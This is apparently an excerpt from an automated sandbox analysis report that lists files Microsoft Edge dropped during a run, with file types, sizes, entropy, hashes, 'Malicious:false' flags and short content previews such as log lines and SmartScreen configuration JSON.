                                                                                                                                                                                                                                                                                                      MD5:5058F1AF8388633F609CADB75A75DC9D
                                                                                                                                                                                                                                                                                                      SHA1:3A52CE780950D4D969792A2559CD519D7EE8C727
                                                                                                                                                                                                                                                                                                      SHA-256:CDB4EE2AEA69CC6A83331BBE96DC2CAA9A299D21329EFB0336FC02A82E1839A8
                                                                                                                                                                                                                                                                                                      SHA-512:0B61241D7C17BCBB1BAEE7094D14B7C451EFECC7FFCBD92598A0F13D313CC9EBC2A07E61F007BAF58FBF94FF9A8695BDD5CAE7CE03BBF1E94E93613A00F25F21
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:.
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 1, database pages 7, cookie 0x4, schema 4, UTF-8, version-valid-for 1
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):28672
                                                                                                                                                                                                                                                                                                      Entropy (8bit):0.3410017321959524
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:12:TLiqi/nGb0EiDFIlTSFbyrKZb9YwFOqAyl+FxOUwa5qgufTJpbZ75fOSG:TLiMNiD+lZk/Fj+6UwccNp15fBG
                                                                                                                                                                                                                                                                                                      MD5:98643AF1CA5C0FE03CE8C687189CE56B
                                                                                                                                                                                                                                                                                                      SHA1:ECADBA79A364D72354C658FD6EA3D5CF938F686B
                                                                                                                                                                                                                                                                                                      SHA-256:4DC3BF7A36AB5DA80C0995FAF61ED0F96C4DE572F2D6FF9F120F9BC44B69E444
                                                                                                                                                                                                                                                                                                      SHA-512:68B69FCE8EF5AB1DDA2994BA4DB111136BD441BC3EFC0251F57DC20A3095B8420669E646E2347EAB7BAF30CACA4BCF74BD88E049378D8DE57DE72E4B8A5FF74B
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):32768
                                                                                                                                                                                                                                                                                                      Entropy (8bit):0.10196763987470935
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:12:+i/1iWFi/1iW8/DspEjVl/PnnnnnnnnnnnvoQ/Eou:+UiWFUiW8/8oPnnnnnnnnnnnv1j
                                                                                                                                                                                                                                                                                                      MD5:7034C3B1278C753C06150AF6829134C3
                                                                                                                                                                                                                                                                                                      SHA1:508D52D00C3398108C1DF45AC51E5FAD32988736
                                                                                                                                                                                                                                                                                                      SHA-256:32D38ADEA18766C1EF5803FCED2E6C7947B842C983DC057D35F03DC43E6CFF65
                                                                                                                                                                                                                                                                                                      SHA-512:30C441F6BFFBC43B4B753FDA4C67C4D78B92EDB22C766AA22F32EADF964EACBC31317C1053DBAC7658C4C68DA8C4E2AC0D1565D85A1812DF7F64CCFDAB679B04
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:SQLite Write-Ahead Log, version 3007000
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):317272
                                                                                                                                                                                                                                                                                                      Entropy (8bit):0.8886937323226495
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:384:fIKBeIo8IinI2luyIjl8vyIhTMRyIRm4yIoOwyIao213yI2Wv8HXy4yCly7yQPyX:4y6XQqxo
                                                                                                                                                                                                                                                                                                      MD5:5756D0EE989246363ACE615D13D6AD79
                                                                                                                                                                                                                                                                                                      SHA1:407449961B5DEB5D7EF18E73D135E79C9437409F
                                                                                                                                                                                                                                                                                                      SHA-256:9A5B9DB7BC1D086EB2AB334BBBB0F92FD001B8A1CD0CD6BBCE5F6CCA843AE0FA
                                                                                                                                                                                                                                                                                                      SHA-512:C022047C909C40B61A611CB37D704A5DE79BFDAFEA024CBC3C6C9E98A207965433CB9895F677DCB626EE1D50EA3B1D20A9AF2D591A4561AC302160B60B85F186
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):694
                                                                                                                                                                                                                                                                                                      Entropy (8bit):3.5283748534437134
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:12:p9lc8QyOuuuuuuuuuuuuuuuuuuuuuuK7lkUlldFAs87:pHayThk8lA
                                                                                                                                                                                                                                                                                                      MD5:6223C3BC38C57DE52071F5FFB57786B0
                                                                                                                                                                                                                                                                                                      SHA1:BF9554E06EFEF1544420ECF33B41E8894FE5DE36
                                                                                                                                                                                                                                                                                                      SHA-256:8F96B1F82A2F413B401902FB8C4C88704EF5AB55E2F34CE2B9A26301AE0F52D5
                                                                                                                                                                                                                                                                                                      SHA-512:98DDACA0FA482F734AB9777939894AA223DAB1660EEE567541407A51F87EFEA9B65E6DEF78D50689D4CFEA5A713B831DC6F6E87EAFE06A93CD3978C201943ED1
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:ASCII text
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):325
                                                                                                                                                                                                                                                                                                      Entropy (8bit):5.253372367897325
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:6:xOabN1L+q2PN723oH+TcwtfrK+IFUt8sOabNjKWZmw+sOabN1LVkwON723oH+Tcq:xv1L+vVaYeb23FUt8sv2W/+sv1LV5OaR
                                                                                                                                                                                                                                                                                                      MD5:8CEAA54FA8CABE4218C06BBFF22C179C
                                                                                                                                                                                                                                                                                                      SHA1:23FA680F6ABA04AE5AEBF722DB349C67D3B29A03
                                                                                                                                                                                                                                                                                                      SHA-256:6FBFAC1E81C61C9A5749DE288F8DB0523DC066DD954744E4995E31D5D3CF5324
                                                                                                                                                                                                                                                                                                      SHA-512:505FEEA9306DCBA4AB105D12D85BB34A53609EF6B54CFD0288FB4F97BDA63B53B20B83A74C7F4523068911A2FF65C725F0031DFCEA3B91051358F14FE7E4ACE8
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:2024/12/23-11:14:57.298 53c Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db/MANIFEST-000001.2024/12/23-11:14:57.298 53c Recovering log #3.2024/12/23-11:14:57.298 53c Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db/000003.log .
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:ASCII text
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):325
                                                                                                                                                                                                                                                                                                      Entropy (8bit):5.253372367897325
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:6:xOabN1L+q2PN723oH+TcwtfrK+IFUt8sOabNjKWZmw+sOabN1LVkwON723oH+Tcq:xv1L+vVaYeb23FUt8sv2W/+sv1LV5OaR
                                                                                                                                                                                                                                                                                                      MD5:8CEAA54FA8CABE4218C06BBFF22C179C
                                                                                                                                                                                                                                                                                                      SHA1:23FA680F6ABA04AE5AEBF722DB349C67D3B29A03
                                                                                                                                                                                                                                                                                                      SHA-256:6FBFAC1E81C61C9A5749DE288F8DB0523DC066DD954744E4995E31D5D3CF5324
                                                                                                                                                                                                                                                                                                      SHA-512:505FEEA9306DCBA4AB105D12D85BB34A53609EF6B54CFD0288FB4F97BDA63B53B20B83A74C7F4523068911A2FF65C725F0031DFCEA3B91051358F14FE7E4ACE8
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:2024/12/23-11:14:57.298 53c Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db/MANIFEST-000001.2024/12/23-11:14:57.298 53c Recovering log #3.2024/12/23-11:14:57.298 53c Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db/000003.log .
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):816
                                                                                                                                                                                                                                                                                                      Entropy (8bit):4.0647916882227655
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:12:G0nYUtTNop//z32m5t/yVf9HqlIZfkBA//DtKhKg+rOyBrgxvB1ySxs:G0nYUtypD32m3yWlIZMBA5NgKIvB8Sxs
                                                                                                                                                                                                                                                                                                      MD5:3BE72D8D40752B3A97028FDB2931FABA
                                                                                                                                                                                                                                                                                                      SHA1:A27EA4726857A948F0A4B074062B674469A9A371
                                                                                                                                                                                                                                                                                                      SHA-256:3C18553C8C3F7E801855F3579AC57F3C156D783BBA27FB35C6D2FB6CB89BD902
                                                                                                                                                                                                                                                                                                      SHA-512:8EBD4D6980BB7796615217E72BC65953C920B68B9259341CD52858C1E889EC90339E2A304FE0C971D6C6EF9AFC4A00CFB3E5CC89C7B2DF8737A0C7EC241BDADC
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:ASCII text
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):343
                                                                                                                                                                                                                                                                                                      Entropy (8bit):5.219950165354706
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:6:xOaZpyq2PN723oH+TcwtfrzAdIFUt8sOaZ/1Zmw+sOaZpRkwON723oH+TcwtfrzS:x/pyvVaYeb9FUt8s/9/+s/pR5OaYeb2J
                                                                                                                                                                                                                                                                                                      MD5:E81F87DA66835FAD61D98E90CA9733CF
                                                                                                                                                                                                                                                                                                      SHA1:13EA4894FF61031CD19DA6E39B74C8A297A39ECB
                                                                                                                                                                                                                                                                                                      SHA-256:B6C80EFE7ABF4BF378939A228ED724B40FC0E0845344E43542D0A4365DFE446B
                                                                                                                                                                                                                                                                                                      SHA-512:CA309F90891FD41B7DE4988453DFBBE2134CFDB5880BEAE7FD92E80BFC19145250703157705FA73BEF2865ED58DCD4151DE702860085DEFC7FDEACFFABCAC135
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:2024/12/23-11:14:57.295 374 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata/MANIFEST-000001.2024/12/23-11:14:57.295 374 Recovering log #3.2024/12/23-11:14:57.295 374 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata/000003.log .
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:ASCII text
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):343
                                                                                                                                                                                                                                                                                                      Entropy (8bit):5.219950165354706
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:6:xOaZpyq2PN723oH+TcwtfrzAdIFUt8sOaZ/1Zmw+sOaZpRkwON723oH+TcwtfrzS:x/pyvVaYeb9FUt8s/9/+s/pR5OaYeb2J
                                                                                                                                                                                                                                                                                                      MD5:E81F87DA66835FAD61D98E90CA9733CF
                                                                                                                                                                                                                                                                                                      SHA1:13EA4894FF61031CD19DA6E39B74C8A297A39ECB
                                                                                                                                                                                                                                                                                                      SHA-256:B6C80EFE7ABF4BF378939A228ED724B40FC0E0845344E43542D0A4365DFE446B
                                                                                                                                                                                                                                                                                                      SHA-512:CA309F90891FD41B7DE4988453DFBBE2134CFDB5880BEAE7FD92E80BFC19145250703157705FA73BEF2865ED58DCD4151DE702860085DEFC7FDEACFFABCAC135
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:2024/12/23-11:14:57.295 374 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata/MANIFEST-000001.2024/12/23-11:14:57.295 374 Recovering log #3.2024/12/23-11:14:57.295 374 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\shared_proto_db\metadata/000003.log .
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):120
                                                                                                                                                                                                                                                                                                      Entropy (8bit):3.32524464792714
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:3:tbloIlrJFlXnpQoWcNylRjlgbYnPdJiG6R7lZAUAl:tbdlrYoWcV0n1IGi7kBl
                                                                                                                                                                                                                                                                                                      MD5:A397E5983D4A1619E36143B4D804B870
                                                                                                                                                                                                                                                                                                      SHA1:AA135A8CC2469CFD1EF2D7955F027D95BE5DFBD4
                                                                                                                                                                                                                                                                                                      SHA-256:9C70F766D3B84FC2BB298EFA37CC9191F28BEC336329CC11468CFADBC3B137F4
                                                                                                                                                                                                                                                                                                      SHA-512:4159EA654152D2810C95648694DD71957C84EA825FCCA87B36F7E3282A72B30EF741805C610C5FA847CA186E34BDE9C289AAA7B6931C5B257F1D11255CD2A816
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s. .(.x.8.6.).\.M.i.c.r.o.s.o.f.t.\.E.d.g.e.\.A.p.p.l.i.c.a.t.i.o.n.\.m.s.e.d.g.e...e.x.e.
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):13
                                                                                                                                                                                                                                                                                                      Entropy (8bit):2.6612262562697895
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:3:NYLFRQZ:ap2Z
                                                                                                                                                                                                                                                                                                      MD5:B64BD80D877645C2DD14265B1A856F8A
                                                                                                                                                                                                                                                                                                      SHA1:F7379E1A6F8CE062E891C56736C789C7EA77CD6A
                                                                                                                                                                                                                                                                                                      SHA-256:83476CEEEB7682F41030664B4E17305986878D14E82D0C277FB99EC546B44569
                                                                                                                                                                                                                                                                                                      SHA-512:734A7316A269C76DD052D980CC0D5209C0BFEDFFC55B11C58FA25C433CE8A42536827298C3E58CACD68CC01593C23D39350E956E8DE2268D8D29918E1F0667F2
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:117.0.2045.55
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):44455
                                                                                                                                                                                                                                                                                                      Entropy (8bit):6.0898018136551775
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:768:+DXzgWPsj/qlGJqIY8GB4kWBdi1zNtPMLkzZ7okEt9r1JDSgzMMd6qD47u3+CioC:+/Ps+wsI7ynn0kzItSmd6qE7lFoC
                                                                                                                                                                                                                                                                                                      MD5:D97F50FFCB5706CD18AA51F6BB81C6CA
                                                                                                                                                                                                                                                                                                      SHA1:38F68E971CF53E78DB46DA70E66F1F41F793FD4B
                                                                                                                                                                                                                                                                                                      SHA-256:0D3226017EF75ED36EED0FAF059760596E0C70A57A8456FAF63C80D497721B2D
                                                                                                                                                                                                                                                                                                      SHA-512:3647F063E1588DEBFE34B2EDDD0A74E96AFB02A4EA30D32E4B00A4113311A594348C1A836F70E8744981E5EC8D5EA721C8303B42C90C68FF81D960960416768B
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","apps_count_check_time":"13340961226065099","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"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
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):44455
                                                                                                                                                                                                                                                                                                      Entropy (8bit):6.0898018136551775
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:768:+DXzgWPsj/qlGJqIY8GB4kWBdi1zNtPMLkzZ7okEt9r1JDSgzMMd6qD47u3+CioC:+/Ps+wsI7ynn0kzItSmd6qE7lFoC
                                                                                                                                                                                                                                                                                                      MD5:D97F50FFCB5706CD18AA51F6BB81C6CA
                                                                                                                                                                                                                                                                                                      SHA1:38F68E971CF53E78DB46DA70E66F1F41F793FD4B
                                                                                                                                                                                                                                                                                                      SHA-256:0D3226017EF75ED36EED0FAF059760596E0C70A57A8456FAF63C80D497721B2D
                                                                                                                                                                                                                                                                                                      SHA-512:3647F063E1588DEBFE34B2EDDD0A74E96AFB02A4EA30D32E4B00A4113311A594348C1A836F70E8744981E5EC8D5EA721C8303B42C90C68FF81D960960416768B
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","apps_count_check_time":"13340961226065099","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"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
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 6, database pages 5, cookie 0x2, schema 4, UTF-8, version-valid-for 6
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):20480
                                                                                                                                                                                                                                                                                                      Entropy (8bit):0.6773696719930975
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:12:TLpUAFUxOUDaabZXiDiIF8izX4fhhdWeci2oesJaYi3islRud6zcQAJmdngzQdoO:TLiOUOq0afDdWec9sJhOs3fsuZ7J5fc
                                                                                                                                                                                                                                                                                                      MD5:6FFCCB198DC6B17E165460E6E246B03C
                                                                                                                                                                                                                                                                                                      SHA1:014A46B0E6E84089E1C20FA232F54CA737D5F023
                                                                                                                                                                                                                                                                                                      SHA-256:D1B2EC8C9906C3418837FFB8E116AA59C026DE2D67B2AFDA956F14D0DC3851AF
                                                                                                                                                                                                                                                                                                      SHA-512:846AE3D0A49A14BF82203A0FEDAD6E794F7E68C22A40EE0E014FEA99DFC676FAE4AFEB2C56F324E4361E83A35458C63E2ABAA7B28B6D23B20FA29EF47CBE87B3
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):47
                                                                                                                                                                                                                                                                                                      Entropy (8bit):4.3818353308528755
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:3:2jRo6jhM6ceYcUtS2djIn:5I2uxUt5Mn
                                                                                                                                                                                                                                                                                                      MD5:48324111147DECC23AC222A361873FC5
                                                                                                                                                                                                                                                                                                      SHA1:0DF8B2267ABBDBD11C422D23338262E3131A4223
                                                                                                                                                                                                                                                                                                      SHA-256:D8D672F953E823063955BD9981532FC3453800C2E74C0CC3653D091088ABD3B3
                                                                                                                                                                                                                                                                                                      SHA-512:E3B5DB7BA5E4E3DE3741F53D91B6B61D6EB9ECC8F4C07B6AE1C2293517F331B716114BAB41D7935888A266F7EBDA6FABA90023EFFEC850A929986053853F1E02
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:customSettings_F95BA787499AB4FA9EFFF472CE383A14
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):35
                                                                                                                                                                                                                                                                                                      Entropy (8bit):4.014438730983427
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:3:YDMGA2ADH/AYKEqsYq:YQXT/bKE1F
                                                                                                                                                                                                                                                                                                      MD5:BB57A76019EADEDC27F04EB2FB1F1841
                                                                                                                                                                                                                                                                                                      SHA1:8B41A1B995D45B7A74A365B6B1F1F21F72F86760
                                                                                                                                                                                                                                                                                                      SHA-256:2BAE8302F9BD2D87AE26ACF692663DF1639B8E2068157451DA4773BD8BD30A2B
                                                                                                                                                                                                                                                                                                      SHA-512:A455D7F8E0BE9A27CFB7BE8FE0B0E722B35B4C8F206CAD99064473F15700023D5995CC2C4FAFDB8FBB50F0BAB3EC8B241E9A512C0766AAAE1A86C3472C589FFD
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:{"forceServiceDetermination":false}
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):81
                                                                                                                                                                                                                                                                                                      Entropy (8bit):4.3439888556902035
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:3:kDnaV6bVsFUIMf1HDOWg3djTHXoSWDSQ97P:kDYaoUIe1HDM3oskP
                                                                                                                                                                                                                                                                                                      MD5:177F4D75F4FEE84EF08C507C3476C0D2
                                                                                                                                                                                                                                                                                                      SHA1:08E17AEB4D4066AC034207420F1F73DD8BE3FAA0
                                                                                                                                                                                                                                                                                                      SHA-256:21EE7A30C2409E0041CDA6C04EEE72688EB92FE995DC94487FF93AD32BD8F849
                                                                                                                                                                                                                                                                                                      SHA-512:94FC142B3CC4844BF2C0A72BCE57363C554356C799F6E581AA3012E48375F02ABD820076A8C2902A3C6BE6AC4D8FA8D4F010D4FF261327E878AF5E5EE31038FB
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:edgeSettings_2.0-48b11410dc937a1723bf4c5ad33ecdb286d8ec69544241bc373f753e64b396c1
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:JSON data
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):130439
                                                                                                                                                                                                                                                                                                      Entropy (8bit):3.80180718117079
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:1536:RlIyFAMrwvaGbyLWzDr6PDofI8vsUnPRLz+PMh:weWGP7Eh
                                                                                                                                                                                                                                                                                                      MD5:EB75CEFFE37E6DF9C171EE8380439EDA
                                                                                                                                                                                                                                                                                                      SHA1:F00119BA869133D64E4F7F0181161BD47968FA23
                                                                                                                                                                                                                                                                                                      SHA-256:48B11410DC937A1723BF4C5AD33ECDB286D8EC69544241BC373F753E64B396C1
                                                                                                                                                                                                                                                                                                      SHA-512:044C5113D877CE2E3B42CF07670620937ED7BE2D8B3BF2BAB085C43EF4F64598A7AC56328DDBBE7F0F3CFB9EA49D38CA332BB4ECBFEDBE24AE53B14334A30C8E
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:{.. "geoidMaps": {.. "au": "https://australia.smartscreen.microsoft.com/",.. "ch": "https://switzerland.smartscreen.microsoft.com/",.. "eu": "https://europe.smartscreen.microsoft.com/",.. "ffl4": "https://unitedstates1.ss.wd.microsoft.us/",.. "ffl4mod": "https://unitedstates4.ss.wd.microsoft.us/",.. "ffl5": "https://unitedstates2.ss.wd.microsoft.us/",.. "in": "https://india.smartscreen.microsoft.com/",.. "test": "https://eu-9.smartscreen.microsoft.com/",.. "uk": "https://unitedkingdom.smartscreen.microsoft.com/",.. "us": "https://unitedstates.smartscreen.microsoft.com/",.. "gw_au": "https://australia.smartscreen.microsoft.com/",.. "gw_ch": "https://switzerland.smartscreen.microsoft.com/",.. "gw_eu": "https://europe.smartscreen.microsoft.com/",.. "gw_ffl4": "https://unitedstates1.ss.wd.microsoft.us/",.. "gw_ffl4mod": "https://unitedstates4.ss.wd.microsoft.us/",.. "gw_ffl5": "https://unitedstates2.ss.wd.microsoft.us/",.. "gw_in": "https
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):40
                                                                                                                                                                                                                                                                                                      Entropy (8bit):4.346439344671015
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:3:kfKbUPVXXMVQX:kygV5
                                                                                                                                                                                                                                                                                                      MD5:6A3A60A3F78299444AACAA89710A64B6
                                                                                                                                                                                                                                                                                                      SHA1:2A052BF5CF54F980475085EEF459D94C3CE5EF55
                                                                                                                                                                                                                                                                                                      SHA-256:61597278D681774EFD8EB92F5836EB6362975A74CEF807CE548E50A7EC38E11F
                                                                                                                                                                                                                                                                                                      SHA-512:C5D0419869A43D712B29A5A11DC590690B5876D1D95C1F1380C2F773CA0CB07B173474EE16FE66A6AF633B04CC84E58924A62F00DCC171B2656D554864BF57A4
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:synchronousLookupUris_638343870221005468
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:data
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):57
                                                                                                                                                                                                                                                                                                      Entropy (8bit):4.556488479039065
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:3:GSCIPPlzYxi21goD:bCWBYx99D
                                                                                                                                                                                                                                                                                                      MD5:3A05EAEA94307F8C57BAC69C3DF64E59
                                                                                                                                                                                                                                                                                                      SHA1:9B852B902B72B9D5F7B9158E306E1A2C5F6112C8
                                                                                                                                                                                                                                                                                                      SHA-256:A8EF112DF7DAD4B09AAA48C3E53272A2EEC139E86590FD80E2B7CBD23D14C09E
                                                                                                                                                                                                                                                                                                      SHA-512:6080AEF2339031FAFDCFB00D3179285E09B707A846FD2EA03921467DF5930B3F9C629D37400D625A8571B900BC46021047770BAC238F6BAC544B48FB3D522FB0
                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                      Preview:9.......murmur3.............,M.h...Z...8.\..<&Li.H..[.?m
                                                                                                                                                                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                      Size (bytes):29
                                                                                                                                                                                                                                                                                                      Entropy (8bit):4.030394788231021
                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                      SSDEEP:3:0xXeZUSXkcVn:0Re5kcV
